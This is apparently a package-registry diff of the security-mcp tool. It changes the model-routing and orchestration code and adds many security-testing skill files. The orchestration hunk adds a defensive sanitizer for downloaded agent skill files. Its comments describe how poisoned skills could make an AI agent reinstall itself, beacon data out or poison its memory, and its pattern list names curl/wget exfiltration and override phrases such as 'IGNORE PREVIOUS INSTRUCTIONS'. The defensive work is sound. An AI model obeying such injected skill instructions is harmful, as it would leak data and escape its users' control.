security-mcp 1.1.4 → 1.3.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (129) hide show
  1. package/README.md +116 -264
  2. package/defaults/checklists/ai.json +20 -1
  3. package/defaults/checklists/api.json +35 -1
  4. package/defaults/checklists/infra.json +34 -1
  5. package/defaults/checklists/mobile.json +23 -1
  6. package/defaults/checklists/payments.json +15 -1
  7. package/defaults/checklists/web.json +11 -1
  8. package/defaults/security-policy.json +2 -2
  9. package/dist/cli/index.js +0 -0
  10. package/dist/gate/baseline.js +82 -7
  11. package/dist/gate/catalog.js +10 -2
  12. package/dist/gate/checks/ai.js +757 -39
  13. package/dist/gate/checks/auth-deep.js +920 -216
  14. package/dist/gate/checks/business-logic.js +751 -0
  15. package/dist/gate/checks/ci-pipeline.js +399 -4
  16. package/dist/gate/checks/crypto.js +423 -2
  17. package/dist/gate/checks/dependencies.js +571 -15
  18. package/dist/gate/checks/graphql.js +201 -19
  19. package/dist/gate/checks/infra.js +246 -1
  20. package/dist/gate/checks/injection-deep.js +827 -184
  21. package/dist/gate/checks/k8s.js +114 -1
  22. package/dist/gate/checks/mobile-android.js +917 -3
  23. package/dist/gate/checks/mobile-ios.js +797 -5
  24. package/dist/gate/checks/required-artifacts.js +194 -0
  25. package/dist/gate/checks/runtime.js +178 -0
  26. package/dist/gate/checks/secrets.js +244 -13
  27. package/dist/gate/checks/supply-chain-deep.js +787 -0
  28. package/dist/gate/checks/web-nextjs.js +572 -48
  29. package/dist/gate/diff.js +17 -5
  30. package/dist/gate/evidence.js +8 -1
  31. package/dist/gate/exceptions.js +131 -9
  32. package/dist/gate/policy.js +280 -131
  33. package/dist/mcp/audit-chain.js +122 -28
  34. package/dist/mcp/auth.js +169 -0
  35. package/dist/mcp/learning.js +129 -4
  36. package/dist/mcp/model-router.js +158 -21
  37. package/dist/mcp/orchestration.js +186 -51
  38. package/dist/mcp/server.js +337 -53
  39. package/dist/repo/fs.js +24 -1
  40. package/dist/repo/search.js +31 -6
  41. package/dist/review/store.js +52 -1
  42. package/package.json +7 -7
  43. package/skills/_TEMPLATE/SKILL.md +99 -0
  44. package/skills/advanced-dos-tester/SKILL.md +109 -0
  45. package/skills/agentic-loop-exploiter/SKILL.md +368 -0
  46. package/skills/ai-llm-redteam/SKILL.md +104 -0
  47. package/skills/ai-model-supply-chain-agent/SKILL.md +103 -0
  48. package/skills/algorithm-implementation-reviewer/SKILL.md +98 -0
  49. package/skills/android-penetration-tester/SKILL.md +455 -46
  50. package/skills/anti-replay-tester/SKILL.md +106 -0
  51. package/skills/appsec-code-auditor/SKILL.md +85 -0
  52. package/skills/artifact-integrity-analyst/SKILL.md +441 -0
  53. package/skills/attack-navigator/SKILL.md +467 -8
  54. package/skills/auth-session-hacker/SKILL.md +102 -0
  55. package/skills/aws-penetration-tester/SKILL.md +456 -0
  56. package/skills/azure-penetration-tester/SKILL.md +490 -3
  57. package/skills/binary-auth-validator/SKILL.md +111 -0
  58. package/skills/bot-detection-specialist/SKILL.md +109 -0
  59. package/skills/business-logic-attacker/SKILL.md +231 -0
  60. package/skills/capec-code-mapper/SKILL.md +84 -0
  61. package/skills/cert-pin-rotation-specialist/SKILL.md +112 -0
  62. package/skills/cicd-pipeline-hijacker/SKILL.md +405 -0
  63. package/skills/ciso-orchestrator/SKILL.md +454 -43
  64. package/skills/cloud-infra-specialist/SKILL.md +118 -0
  65. package/skills/compliance-gap-analyst/SKILL.md +422 -0
  66. package/skills/compliance-grc/SKILL.md +85 -0
  67. package/skills/compliance-lifecycle-tracker/SKILL.md +84 -0
  68. package/skills/credential-stuffing-specialist/SKILL.md +102 -0
  69. package/skills/crypto-pki-specialist/SKILL.md +87 -0
  70. package/skills/csa-ccm-mapper/SKILL.md +84 -0
  71. package/skills/csf2-governance-mapper/SKILL.md +84 -0
  72. package/skills/deep-link-fuzzer/SKILL.md +109 -0
  73. package/skills/dependency-confusion-attacker/SKILL.md +415 -0
  74. package/skills/device-integrity-aggregator/SKILL.md +108 -0
  75. package/skills/dos-resilience-tester/SKILL.md +97 -0
  76. package/skills/dread-scorer/SKILL.md +84 -0
  77. package/skills/egress-policy-enforcer/SKILL.md +99 -0
  78. package/skills/evidence-collector/SKILL.md +98 -0
  79. package/skills/file-upload-attacker/SKILL.md +109 -0
  80. package/skills/gcp-penetration-tester/SKILL.md +459 -2
  81. package/skills/git-history-secret-scanner/SKILL.md +106 -0
  82. package/skills/iam-privesc-graph-builder/SKILL.md +152 -0
  83. package/skills/incident-responder/SKILL.md +111 -0
  84. package/skills/injection-specialist/SKILL.md +102 -0
  85. package/skills/ios-security-auditor/SKILL.md +282 -0
  86. package/skills/json-ambiguity-tester/SKILL.md +0 -0
  87. package/skills/k8s-container-escaper/SKILL.md +384 -0
  88. package/skills/key-management-lifecycle-analyst/SKILL.md +98 -0
  89. package/skills/kill-switch-engineer/SKILL.md +102 -0
  90. package/skills/linddun-privacy-analyst/SKILL.md +102 -0
  91. package/skills/logic-race-fuzzer/SKILL.md +443 -0
  92. package/skills/mobile-api-network-attacker/SKILL.md +421 -0
  93. package/skills/mobile-binary-hardener/SKILL.md +102 -0
  94. package/skills/mobile-security-specialist/SKILL.md +85 -0
  95. package/skills/mobile-webview-auditor/SKILL.md +96 -0
  96. package/skills/model-extraction-attacker/SKILL.md +219 -0
  97. package/skills/multipart-abuse-tester/SKILL.md +84 -0
  98. package/skills/oauth-pkce-specialist/SKILL.md +104 -0
  99. package/skills/parser-exhaustion-tester/SKILL.md +142 -0
  100. package/skills/pentest-infra/SKILL.md +98 -0
  101. package/skills/pentest-social/SKILL.md +201 -0
  102. package/skills/pentest-team/SKILL.md +87 -0
  103. package/skills/pentest-web-api/SKILL.md +98 -0
  104. package/skills/privacy-flow-analyst/SKILL.md +234 -0
  105. package/skills/prompt-injection-specialist/SKILL.md +394 -0
  106. package/skills/quantum-migration-planner/SKILL.md +96 -0
  107. package/skills/rag-poisoning-specialist/SKILL.md +358 -0
  108. package/skills/registry-mirror-enforcer/SKILL.md +84 -0
  109. package/skills/rotation-validation-agent/SKILL.md +112 -0
  110. package/skills/samm-assessor/SKILL.md +85 -0
  111. package/skills/secrets-mask-bypass-tester/SKILL.md +100 -0
  112. package/skills/senior-security-engineer/SKILL.md +167 -0
  113. package/skills/serialization-memory-attacker/SKILL.md +332 -0
  114. package/skills/session-timeout-tester/SKILL.md +161 -0
  115. package/skills/slsa-level3-enforcer/SKILL.md +112 -0
  116. package/skills/slsa-provenance-enforcer/SKILL.md +102 -0
  117. package/skills/ssrf-detection-validator/SKILL.md +108 -0
  118. package/skills/step-up-auth-enforcer/SKILL.md +84 -0
  119. package/skills/stride-pasta-analyst/SKILL.md +420 -0
  120. package/skills/supply-chain-devsecops/SKILL.md +98 -0
  121. package/skills/threat-infrastructure-analyst/SKILL.md +84 -0
  122. package/skills/threat-modeler/SKILL.md +85 -0
  123. package/skills/tls-certificate-auditor/SKILL.md +573 -18
  124. package/skills/token-reuse-detector/SKILL.md +95 -0
  125. package/skills/trike-risk-modeler/SKILL.md +84 -0
  126. package/skills/unicode-homograph-tester/SKILL.md +84 -0
  127. package/skills/waf-rule-lifecycle-agent/SKILL.md +97 -0
  128. package/skills/webhook-security-tester/SKILL.md +102 -0
  129. package/skills/zero-trust-architect/SKILL.md +109 -0
@@ -35,9 +35,28 @@ const MEMORY_DIR = join(".mcp", "memory");
35
35
  const USAGE_FILE = join(MEMORY_DIR, "model-usage.json");
36
36
  const HEALTH_FILE = join(MEMORY_DIR, "provider-health.json");
37
37
  const POLICY_FILE = join(".mcp", "policies", "security-policy.json");
38
- const DEFAULT_BUDGET_USD = 5.0;
38
+ const DEFAULT_BUDGET_USD = 5;
39
39
  const CIRCUIT_BREAKER_THRESHOLD = 3; // failures before circuit opens
40
40
  const CIRCUIT_BREAKER_COOLDOWN_MS = 60_000; // 60 seconds
41
+ // ---------------------------------------------------------------------------
42
+ // Rate limiting — recordProviderFailure to prevent circuit-breaker manipulation
43
+ // ---------------------------------------------------------------------------
44
+ const _providerFailureSubmissions = new Map();
45
+ const FAILURE_RATE_LIMIT = 5; // max 5 failure reports per provider per window
46
+ const FAILURE_WINDOW_MS = 300_000; // 5 minute window
47
+ export function recordProviderFailureRateLimited(providerName) {
48
+ const now = Date.now();
49
+ const entry = _providerFailureSubmissions.get(providerName);
50
+ if (!entry || now - entry.windowStart > FAILURE_WINDOW_MS) {
51
+ _providerFailureSubmissions.set(providerName, { count: 1, windowStart: now });
52
+ return { allowed: true };
53
+ }
54
+ if (entry.count >= FAILURE_RATE_LIMIT) {
55
+ return { allowed: false, reason: `Rate limit exceeded: max ${FAILURE_RATE_LIMIT} failure reports per provider per 5 minutes` };
56
+ }
57
+ entry.count++;
58
+ return { allowed: true };
59
+ }
41
60
  /**
42
61
  * Full model registry across all providers.
43
62
  * Pricing sourced from public pricing pages (approximate, for routing decisions only).
@@ -57,8 +76,8 @@ export const MODEL_REGISTRY = [
57
76
  modelId: "claude-sonnet-4-6",
58
77
  provider: "anthropic",
59
78
  capabilityTier: "standard",
60
- inputPer1M: 3.0,
61
- outputPer1M: 15.0,
79
+ inputPer1M: 3,
80
+ outputPer1M: 15,
62
81
  label: "Claude Sonnet 4.6"
63
82
  },
64
83
  // OpenAI — GPT
@@ -67,15 +86,15 @@ export const MODEL_REGISTRY = [
67
86
  provider: "openai",
68
87
  capabilityTier: "light",
69
88
  inputPer1M: 0.15,
70
- outputPer1M: 0.60,
89
+ outputPer1M: 0.6,
71
90
  label: "GPT-4o Mini"
72
91
  },
73
92
  {
74
93
  modelId: "gpt-4o",
75
94
  provider: "openai",
76
95
  capabilityTier: "standard",
77
- inputPer1M: 2.50,
78
- outputPer1M: 10.0,
96
+ inputPer1M: 2.5,
97
+ outputPer1M: 10,
79
98
  label: "GPT-4o"
80
99
  },
81
100
  // Google — Gemini
@@ -84,7 +103,7 @@ export const MODEL_REGISTRY = [
84
103
  provider: "google",
85
104
  capabilityTier: "light",
86
105
  inputPer1M: 0.075,
87
- outputPer1M: 0.30,
106
+ outputPer1M: 0.3,
88
107
  label: "Gemini 1.5 Flash"
89
108
  },
90
109
  {
@@ -92,7 +111,7 @@ export const MODEL_REGISTRY = [
92
111
  provider: "google",
93
112
  capabilityTier: "standard",
94
113
  inputPer1M: 1.25,
95
- outputPer1M: 5.0,
114
+ outputPer1M: 5,
96
115
  label: "Gemini 1.5 Pro"
97
116
  },
98
117
  // Cohere — Command R
@@ -101,17 +120,44 @@ export const MODEL_REGISTRY = [
101
120
  provider: "cohere",
102
121
  capabilityTier: "light",
103
122
  inputPer1M: 0.15,
104
- outputPer1M: 0.60,
123
+ outputPer1M: 0.6,
105
124
  label: "Command R"
106
125
  },
107
126
  {
108
127
  modelId: "command-r-plus",
109
128
  provider: "cohere",
110
129
  capabilityTier: "standard",
111
- inputPer1M: 2.50,
112
- outputPer1M: 10.0,
130
+ inputPer1M: 2.5,
131
+ outputPer1M: 10,
113
132
  label: "Command R+"
114
133
  },
134
+ // Anthropic — Claude Opus (advanced tier, opt-in via advanced_task_preference in policy)
135
+ {
136
+ modelId: "claude-opus-4-8",
137
+ provider: "anthropic",
138
+ capabilityTier: "advanced",
139
+ inputPer1M: 15,
140
+ outputPer1M: 75,
141
+ label: "Claude Opus 4.8"
142
+ },
143
+ // OpenAI — o1 (advanced tier)
144
+ {
145
+ modelId: "o1",
146
+ provider: "openai",
147
+ capabilityTier: "advanced",
148
+ inputPer1M: 15,
149
+ outputPer1M: 60,
150
+ label: "OpenAI o1"
151
+ },
152
+ // Google — Gemini 2.0 Flash (advanced tier)
153
+ {
154
+ modelId: "gemini-2.0-flash-thinking-exp",
155
+ provider: "google",
156
+ capabilityTier: "advanced",
157
+ inputPer1M: 0,
158
+ outputPer1M: 0,
159
+ label: "Gemini 2.0 Flash Thinking (experimental)"
160
+ },
115
161
  // Local — Ollama (zero cost, requires Ollama at localhost:11434)
116
162
  {
117
163
  modelId: "llama3",
@@ -235,6 +281,16 @@ async function loadPreferredProviders() {
235
281
  return null;
236
282
  }
237
283
  }
284
+ async function loadAdvancedTaskPreferences() {
285
+ try {
286
+ const raw = await readFile(POLICY_FILE, "utf-8");
287
+ const policy = JSON.parse(raw);
288
+ return policy.model_budget?.advanced_task_preference ?? [];
289
+ }
290
+ catch {
291
+ return [];
292
+ }
293
+ }
238
294
  // ---------------------------------------------------------------------------
239
295
  // Circuit breaker helpers
240
296
  // ---------------------------------------------------------------------------
@@ -265,12 +321,31 @@ function legacyTier(capTier) {
265
321
  * Select the cheapest healthy model that meets the capability requirement for
266
322
  * the given task type. Respects preferred_providers policy and circuit breakers.
267
323
  *
268
- * @param requiredTier Minimum capability tier for the task.
269
- * @param health Current provider health store.
270
- * @param preferred Optional ordered list of preferred providers.
271
- * @returns [chosen model, failoverUsed]
324
+ * @param requiredTier Minimum capability tier for the task.
325
+ * @param health Current provider health store.
326
+ * @param preferred Optional ordered list of preferred providers.
327
+ * @param preferAdvanced If true, try advanced-tier models first, fall back to standard.
328
+ * @returns [chosen model, failoverUsed]
272
329
  */
273
- function selectModel(requiredTier, health, preferred) {
330
+ function selectModel(requiredTier, health, preferred, preferAdvanced = false) {
331
+ // If advanced is preferred, try advanced-tier models first. Fall back gracefully to
332
+ // standard if none are healthy or registered — zero impact for users without Opus/o1.
333
+ if (preferAdvanced) {
334
+ const advancedCandidates = MODEL_REGISTRY.filter((m) => m.capabilityTier === "advanced");
335
+ const healthyAdvanced = advancedCandidates.filter((m) => !isCircuitOpen(health.providers[m.provider]));
336
+ if (healthyAdvanced.length > 0) {
337
+ const pool = preferred
338
+ ? [
339
+ ...healthyAdvanced.filter((m) => preferred.includes(m.provider)),
340
+ ...healthyAdvanced.filter((m) => !preferred.includes(m.provider))
341
+ ]
342
+ : healthyAdvanced;
343
+ pool.sort((a, b) => combinedCost(a) - combinedCost(b));
344
+ if (pool.length > 0)
345
+ return [pool[0], false];
346
+ }
347
+ // No advanced model available — fall through to standard selection silently.
348
+ }
274
349
  // Candidates: all models meeting the capability floor.
275
350
  const candidates = MODEL_REGISTRY.filter((m) => meetsCapabilityFloor(m, requiredTier));
276
351
  // Separate healthy vs. circuit-open providers.
@@ -304,14 +379,16 @@ function selectModel(requiredTier, health, preferred) {
304
379
  * Falls back to next-cheapest provider on circuit breaker open.
305
380
  */
306
381
  export async function getModelForTask(taskType, _opts) {
307
- const [store, health, maxBudget, preferred] = await Promise.all([
382
+ const [store, health, maxBudget, preferred, advancedPrefs] = await Promise.all([
308
383
  loadUsageStore(),
309
384
  loadHealthStore(),
310
385
  loadMaxBudget(),
311
- loadPreferredProviders()
386
+ loadPreferredProviders(),
387
+ loadAdvancedTaskPreferences()
312
388
  ]);
313
389
  const requiredTier = TASK_CAPABILITY_MAP[taskType];
314
- const [chosen, failoverUsed] = selectModel(requiredTier, health, preferred);
390
+ const preferAdvanced = advancedPrefs.includes(taskType);
391
+ const [chosen, failoverUsed] = selectModel(requiredTier, health, preferred, preferAdvanced);
315
392
  const spent = store.totalSpentUsd;
316
393
  const remaining = maxBudget - spent;
317
394
  const utilizationPct = maxBudget > 0 ? (spent / maxBudget) * 100 : 0;
@@ -326,6 +403,39 @@ export async function getModelForTask(taskType, _opts) {
326
403
  budgetStatus = "ok";
327
404
  }
328
405
  const rationale = buildRationale(taskType, requiredTier, chosen, failoverUsed, preferred);
406
+ // Determine whether all providers were circuit-open (best-effort fallback path).
407
+ const allProviders = ["anthropic", "openai", "google", "cohere", "local"];
408
+ const allCircuitsOpen = allProviders.every((p) => isCircuitOpen(health.providers[p]));
409
+ // ISO 42001 §9.1 — emit structured audit log for every routing decision.
410
+ let routingReason;
411
+ if (allCircuitsOpen) {
412
+ routingReason = "circuit_open_fallback";
413
+ }
414
+ else if (failoverUsed) {
415
+ routingReason = "capability_match";
416
+ }
417
+ else {
418
+ routingReason = "cost_optimized";
419
+ }
420
+ console.log(JSON.stringify({
421
+ event: "MODEL_ROUTING_DECISION",
422
+ timestamp: new Date().toISOString(),
423
+ taskType,
424
+ selectedModel: chosen.modelId,
425
+ selectedProvider: chosen.provider,
426
+ reason: routingReason,
427
+ circuitState: allCircuitsOpen ? "FALLBACK" : "NORMAL",
428
+ }));
429
+ // Additional high-severity audit entry for the circuit-breaker fallback path.
430
+ if (allCircuitsOpen) {
431
+ console.warn(JSON.stringify({
432
+ event: "MODEL_ROUTING_CIRCUIT_FALLBACK",
433
+ timestamp: new Date().toISOString(),
434
+ reason: "ALL_PROVIDERS_CIRCUIT_OPEN",
435
+ fallbackModel: chosen.modelId,
436
+ severity: "HIGH",
437
+ }));
438
+ }
329
439
  return {
330
440
  model: chosen.modelId,
331
441
  provider: chosen.provider,
@@ -358,8 +468,8 @@ function buildRationale(taskType, required, chosen, failoverUsed, preferred) {
358
468
  export async function trackUsage(usage) {
359
469
  const [store, health] = await Promise.all([loadUsageStore(), loadHealthStore()]);
360
470
  const model = MODEL_REGISTRY.find((m) => m.modelId === usage.model);
361
- const inputRate = model?.inputPer1M ?? (usage.tier === "haiku" ? 0.25 : 3.0);
362
- const outputRate = model?.outputPer1M ?? (usage.tier === "haiku" ? 1.25 : 15.0);
471
+ const inputRate = model?.inputPer1M ?? (usage.tier === "haiku" ? 0.25 : 3);
472
+ const outputRate = model?.outputPer1M ?? (usage.tier === "haiku" ? 1.25 : 15);
363
473
  const estimatedCost = (usage.inputTokens / 1_000_000) * inputRate +
364
474
  (usage.outputTokens / 1_000_000) * outputRate;
365
475
  const record = {
@@ -389,8 +499,13 @@ export async function trackUsage(usage) {
389
499
  /**
390
500
  * Record a provider failure (connection error, rate limit, auth failure).
391
501
  * Opens circuit breaker after CIRCUIT_BREAKER_THRESHOLD consecutive failures.
502
+ * Rate-limited to prevent deliberate circuit-breaker manipulation (max 5 per provider per 5 min).
392
503
  */
393
504
  export async function recordProviderFailure(provider) {
505
+ const rateCheck = recordProviderFailureRateLimited(provider);
506
+ if (!rateCheck.allowed) {
507
+ return { recorded: false, reason: rateCheck.reason };
508
+ }
394
509
  const health = await loadHealthStore();
395
510
  const now = new Date();
396
511
  const state = health.providers[provider] ?? {
@@ -407,6 +522,28 @@ export async function recordProviderFailure(provider) {
407
522
  }
408
523
  health.providers[provider] = state;
409
524
  await saveHealthStore(health);
525
+ // Circuit-state audit: warn and emit structured audit record if all known providers are circuit-open.
526
+ // Deliberate manipulation requires only CIRCUIT_BREAKER_THRESHOLD (3) failures per provider × 5 providers
527
+ // = 15 calls, constrained to max 5 per provider per 5-min window. Log at ERROR level so SIEM picks this up.
528
+ // MITRE ATLAS AML.T0040 (ML Model Inference API) — circuit-breaker exhaustion attack.
529
+ const allProviders = ["anthropic", "openai", "google", "cohere", "local"];
530
+ const allProvidersDown = allProviders.every((p) => isCircuitOpen(health.providers[p]));
531
+ if (allProvidersDown) {
532
+ // Determine which fallback model will be used (cheapest in registry, circuit ignored).
533
+ const fallbackCandidates = MODEL_REGISTRY.filter((m) => m.provider === "anthropic" && m.capabilityTier === "standard");
534
+ const fallbackModel = fallbackCandidates[0]?.modelId ?? "unknown";
535
+ console.error(JSON.stringify({
536
+ severity: "CRITICAL",
537
+ event: "ALL_PROVIDERS_CIRCUIT_OPEN",
538
+ message: "All AI providers are circuit-open. Routing to fallback model. This may indicate deliberate circuit-breaker manipulation.",
539
+ fallbackModel,
540
+ timestamp: new Date().toISOString(),
541
+ failingProvider: provider,
542
+ mitre: "AML.T0040",
543
+ action: "Manual investigation required. Call security.reset_provider_circuit after confirming provider health."
544
+ }));
545
+ }
546
+ return { recorded: true };
410
547
  }
411
548
  /**
412
549
  * Return health status for all providers — circuit breaker state and call counts.
@@ -12,7 +12,7 @@
12
12
  * 8. orchestration.apply_updates — run auto-update (auto | manual)
13
13
  * 9. orchestration.verify_skill_coverage — report uncovered SKILL.md sections
14
14
  */
15
- import { createHash } from "node:crypto";
15
+ import { createHash, randomBytes } from "node:crypto";
16
16
  import * as https from "node:https";
17
17
  import { mkdir, readFile, writeFile, readdir } from "node:fs/promises";
18
18
  import { existsSync, readFileSync, writeFileSync, renameSync, mkdirSync } from "node:fs";
@@ -28,7 +28,12 @@ const MEMORY_DIR = join(homedir(), ".security-mcp", "agent-memory");
28
28
  const SKILL_VERSIONS_PATH = join(homedir(), ".security-mcp", "skill-versions.json");
29
29
  const SKILLS_MANIFEST_URL = "https://raw.githubusercontent.com/AbrahamOO/security-mcp/main/skills-manifest.json";
30
30
  const CLAUDE_SKILLS_DIR = join(homedir(), ".claude", "skills");
31
+ // CWE-494: Pin the registry URL to the canonical npm registry. Never allow
32
+ // this to be overridden by env vars — a compromised env could redirect to a
33
+ // malicious registry.
31
34
  const NPM_REGISTRY_URL = "https://registry.npmjs.org/security-mcp/latest";
35
+ // Strict SemVer pattern — rejects any version string that doesn't conform.
36
+ const SEMVER_RE = /^\d{1,5}\.\d{1,5}\.\d{1,5}(?:-[\w.+]+)?$/;
32
37
  // CWE-22: input validation patterns for path components
33
38
  const SAFE_SKILL_NAME_RE = /^[a-zA-Z0-9][a-zA-Z0-9._-]{0,127}$/;
34
39
  const SAFE_AGENT_NAME_RE = /^[a-zA-Z0-9][a-zA-Z0-9._-]{0,127}$/;
@@ -39,12 +44,18 @@ const ALLOWED_SKILL_URL_PREFIX = "https://raw.githubusercontent.com/";
39
44
  const MAX_MANIFEST_BYTES = 256 * 1024; // 256 KB
40
45
  const MAX_SKILL_BYTES = 512 * 1024; // 512 KB
41
46
  const MAX_NPM_BYTES = 64 * 1024; // 64 KB
42
- // All SKILL.md sections that must be covered per run
47
+ // All SKILL.md sections that must be covered per run.
48
+ // §EDGE-CASE-MATRIX, §TEMPORAL-THREATS, §DETECTION-GAP, §ZERO-MISS-MANDATE are the
49
+ // four universal sections added to every skill; coverage verification tracks them too.
43
50
  const SKILL_MD_SECTIONS = [
44
51
  "§1", "§2", "§3", "§4", "§5", "§6", "§7", "§8",
45
52
  "§9", "§10", "§11", "§12", "§13", "§14", "§15",
46
53
  "§16", "§17", "§18", "§19", "§20", "§21", "§22",
47
- "§23", "§24"
54
+ "§23", "§24",
55
+ "§EDGE-CASE-MATRIX",
56
+ "§TEMPORAL-THREATS",
57
+ "§DETECTION-GAP",
58
+ "§ZERO-MISS-MANDATE"
48
59
  ];
49
60
  // ---------------------------------------------------------------------------
50
61
  // Internal helpers
@@ -198,8 +209,11 @@ export const CreateAgentRunSchema = z.object({
198
209
  });
199
210
  export async function createAgentRun(args) {
200
211
  const { runId, scope, internetPermitted, stackContext } = args;
212
+ // Use 16 bytes of CSPRNG entropy (not Date.now()) so the ID cannot be
213
+ // predicted or brute-forced even when runId is known.
201
214
  const agentRunId = createHash("sha256")
202
- .update(`${runId}:${Date.now()}`)
215
+ .update(`${runId}:`)
216
+ .update(randomBytes(16))
203
217
  .digest("hex")
204
218
  .slice(0, 32);
205
219
  await ensureDir(agentRunDir(agentRunId));
@@ -221,10 +235,12 @@ export async function createAgentRun(args) {
221
235
  // ---------------------------------------------------------------------------
222
236
  export const UpdateAgentStatusSchema = z.object({
223
237
  agentRunId: z.string().describe("Agent run ID from orchestration.create_agent_run."),
224
- agentName: z.string().describe("Name of the agent updating its status."),
238
+ // CWE-22: constrain agentName to the same safe-name pattern used in path operations
239
+ agentName: z.string().regex(SAFE_AGENT_NAME_RE, "agentName must be alphanumeric with ._- separators").describe("Name of the agent updating its status."),
225
240
  status: z.enum(["running", "completed", "completed_partial", "failed"]),
226
- findingsPath: z.string().optional().describe("Relative path to the agent findings JSON file."),
227
- summary: z.string().optional().describe("One-line outcome summary.")
241
+ // CWE-22: findingsPath is stored in the manifest and may later be used as a path — restrict to safe relative path
242
+ findingsPath: z.string().regex(/^[a-zA-Z0-9][\w./,-]{0,255}$/, "findingsPath must be a safe relative path").optional().describe("Relative path to the agent findings JSON file."),
243
+ summary: z.string().max(500).optional().describe("One-line outcome summary.")
228
244
  });
229
245
  export async function updateAgentStatus(args) {
230
246
  const { agentRunId, agentName, status, findingsPath, summary } = args;
@@ -364,6 +380,68 @@ export async function mergeAgentFindings(args) {
364
380
  }
365
381
  // 4. ensure_skill
366
382
  // ---------------------------------------------------------------------------
383
+ // ---------------------------------------------------------------------------
384
+ // POC-7 fix: SKILL.md content sanitization
385
+ // ---------------------------------------------------------------------------
386
+ /**
387
+ * Patterns that indicate a backdoor or persistence mechanism in SKILL.md content.
388
+ * These are stripped (line removed) before the file is written to disk.
389
+ *
390
+ * Attack classes defended against:
391
+ * 1. Self-re-installation: instructions telling the agent to call ensure_skill
392
+ * on every invocation so a malicious version survives reinstallation.
393
+ * 2. Exfiltration beacons: instructions to POST/GET findings to external URLs.
394
+ * 3. Memory poisoning: instructions to write arbitrary false-positives entries.
395
+ * 4. System prompt override: attempts to redefine the agent's core instructions
396
+ * via embedded meta-prompt directives.
397
+ */
398
+ const SKILL_BACKDOOR_PATTERNS = [
399
+ // Re-installation / self-update triggers
400
+ /ensure_skill\s*\(/i,
401
+ /orchestration\.ensure_skill/i,
402
+ /on\s+every\s+(invocation|run|start)/i,
403
+ /at\s+the\s+(start|beginning)\s+of\s+every/i,
404
+ /auto.?update\s+this\s+skill/i,
405
+ // Exfiltration
406
+ /\bfetch\s*\(\s*["'`]https?:\/\/(?!raw\.githubusercontent\.com)/i,
407
+ /\bcurl\s+https?:\/\/(?!raw\.githubusercontent\.com)/i,
408
+ /\bwget\s+https?:\/\/(?!raw\.githubusercontent\.com)/i,
409
+ // Memory poisoning directives
410
+ /write_agent_memory.*false.?positive/i,
411
+ /add.*false.?positive.*finding/i,
412
+ // Meta-prompt takeover markers
413
+ /<\s*system\s*>/i,
414
+ /IGNORE\s+PREVIOUS\s+INSTRUCTIONS/i,
415
+ /IGNORE\s+ALL\s+PRIOR/i,
416
+ /DISREGARD\s+PREVIOUS/i,
417
+ ];
418
+ /**
419
+ * Sanitizes downloaded SKILL.md content by removing lines that match known
420
+ * backdoor / prompt-injection patterns. Throws if more than 10 % of lines are
421
+ * stripped (indicates the skill file itself may be malicious).
422
+ */
423
+ function sanitizeSkillContent(content, skillName) {
424
+ const lines = content.split("\n");
425
+ const stripped = [];
426
+ const clean = lines.filter((line, idx) => {
427
+ const isMalicious = SKILL_BACKDOOR_PATTERNS.some((re) => re.test(line));
428
+ if (isMalicious)
429
+ stripped.push(idx + 1);
430
+ return !isMalicious;
431
+ });
432
+ if (stripped.length > 0) {
433
+ console.warn(`[ensureSkill] Stripped ${stripped.length} suspicious line(s) from "${skillName}" SKILL.md ` +
434
+ `(lines: ${stripped.join(", ")}). Review the source file.`);
435
+ }
436
+ // If more than 10 % of lines were stripped, the file is likely malicious — refuse install.
437
+ const strippedFraction = stripped.length / Math.max(lines.length, 1);
438
+ if (strippedFraction > 0.10) {
439
+ throw new Error(`SKILL.md for "${skillName}" was rejected: ${stripped.length}/${lines.length} lines ` +
440
+ `matched backdoor patterns (>${Math.round(strippedFraction * 100)}% threshold). ` +
441
+ `Do not install this skill.`);
442
+ }
443
+ return clean.join("\n");
444
+ }
367
445
  export const EnsureSkillSchema = z.object({
368
446
  skillName: z.string().describe("Name of the skill to ensure is installed (e.g. 'threat-modeler')."),
369
447
  version: z.string().optional().describe("Required version; re-downloads if installed version differs.")
@@ -402,21 +480,26 @@ export async function ensureSkill(args) {
402
480
  if (!content) {
403
481
  throw new Error(`Failed to download SKILL.md for "${skillName}" from ${entry.url}`);
404
482
  }
405
- // CWE-494: verify SHA-256 of downloaded skill content against manifest hash
483
+ // CWE-494: verify SHA-256 of downloaded skill content against manifest hash.
484
+ // sha256 is MANDATORY — reject any manifest entry that omits it. An absent sha256
485
+ // field is itself an attack vector (allows content substitution without detection).
406
486
  const actualHash = createHash("sha256").update(content, "utf-8").digest("hex");
407
- if (entry.sha256) {
408
- const expectedHash = entry.sha256;
409
- if (actualHash !== expectedHash) {
410
- throw new Error(`Integrity check failed for skill "${skillName}": expected ${expectedHash}, got ${actualHash}`);
411
- }
487
+ const expectedHash = entry.sha256;
488
+ if (!expectedHash) {
489
+ throw new Error(`Integrity check failed for skill "${skillName}": manifest entry has no sha256 field. ` +
490
+ `All skill entries must include a sha256 hash. Refusing to install.`);
412
491
  }
413
- else {
414
- console.warn(`[ensureSkill] No sha256 in manifest for "${skillName}" skipping integrity check. Consider pinning the manifest to a commit SHA.`);
492
+ if (actualHash !== expectedHash) {
493
+ throw new Error(`Integrity check failed for skill "${skillName}": expected ${expectedHash}, got ${actualHash}`);
415
494
  }
495
+ // POC-7 fix: sanitize SKILL.md content before writing to disk.
496
+ // Strip instruction patterns that would cause the agent to re-invoke ensure_skill
497
+ // on every run (persistence backdoor) or exfiltrate data to external URLs.
498
+ const sanitized = sanitizeSkillContent(content, skillName);
416
499
  // Write skill atomically (write to temp, then rename) to prevent partial-write corruption
417
500
  mkdirSync(dirname(skillPath), { recursive: true });
418
501
  const tmpSkillPath = `${skillPath}.tmp.${process.pid}`;
419
- writeFileSync(tmpSkillPath, content, "utf-8");
502
+ writeFileSync(tmpSkillPath, sanitized, "utf-8");
420
503
  renameSync(tmpSkillPath, skillPath);
421
504
  // Update version cache
422
505
  versions[skillName] = { version: entry.version, installedAt: new Date().toISOString(), path: skillPath };
@@ -446,14 +529,26 @@ export async function readAgentMemory(args) {
446
529
  }
447
530
  // 6. write_agent_memory
448
531
  // ---------------------------------------------------------------------------
532
+ // CWE-20: typed schema for false-positive entries — prevents arbitrary suppression payloads
533
+ const FalsePositiveEntrySchema = z.object({
534
+ findingId: z.string().min(1).max(128).regex(/^[A-Z0-9_-]+$/, "findingId must be UPPER_SNAKE_CASE"),
535
+ reason: z.string().min(1).max(500),
536
